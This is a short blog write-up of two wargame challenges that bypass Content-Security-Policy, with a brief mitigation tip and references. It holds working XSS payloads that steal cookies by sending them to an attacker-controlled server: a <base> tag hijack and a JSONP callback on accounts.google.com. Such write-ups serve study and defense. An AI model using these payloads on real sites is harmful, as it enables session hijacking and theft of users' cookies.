Saturday, 24 April 2021

CSP bypass with wargame

What is Content-Security-Policy (CSP)?

Conent Security Policy (CSP) is an added security layer that helps to detect and mitigate certain types of attacks, including Cross Site Scripting (XSS) and data injectino attacks.

However, it could be unsafe if there is wrong CSP configuration.

Below is a sample unsafe scenarios with wargame probs.

#1. Bypass CSP script-src 'nonce-random'.

First prob, there is CSP with script-src 'nonce-random' in HTTP header.
HTTP/1.1 200 OK
Date: Fri, 23 Apr 2021 22:01:38 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Security-Policy: script-src 'nonce-uMiBg4W3wGgp8JQnJG2TL7WLGE8=';
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 133
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
I tried CSS brute-force attack to take the nonce-random value, however, it did not work. I looked again source code of the prob. There was loaded internal script file "script.js" as per below:
<h2>you can inject anything</h2>
<div id="injected">
foo
</div>
<script nonce="" src="/script.js" umibg4w3wggp8jqnjg2tl7wlge8=""></script>
Yes! now I have a chance to load the script.js file from my server using <base> tag. It is because the CSP does not include base-uri.

I can steal an admin cookie with this Payload:
<base href='http://[my server IP]/'>

script.js in my server
location.href='http://[my server IP]'+cookie;

#2. Bypass CSP script-src "https://*.google.com"

Secode prob, there is CSP with script-src 'https://*.google.com'.

HTTP/1.1 200 OK
Date: Fri, 23 Apr 2021 22:52:02 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Security-Policy: script-src https://*.google.com/;
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 90
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
It allowed only google. Many websites use Google's API a lot. And Google always overlooks being safe. This problem is probably the wrong CSP setting, which can be seen a lot.

I bypassed this CSP with this payload:
<script src=https://accounts.google.com/o/oauth2/revoke?callback=var/**/a%3d%27http://[my server ip]%27;location.replace(a%252bcookie);></script>
As the payload, this vulnerability is using json callback on google.com.

How to mitigate this problem? It could solve to allow specific url for CSP. For example, script-src https://apis.google.com

~ kerz

Reference:
Conent Security Policy (CSP): https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP
Secure CSP: https://developers.google.com/web/fundamentals/security/csp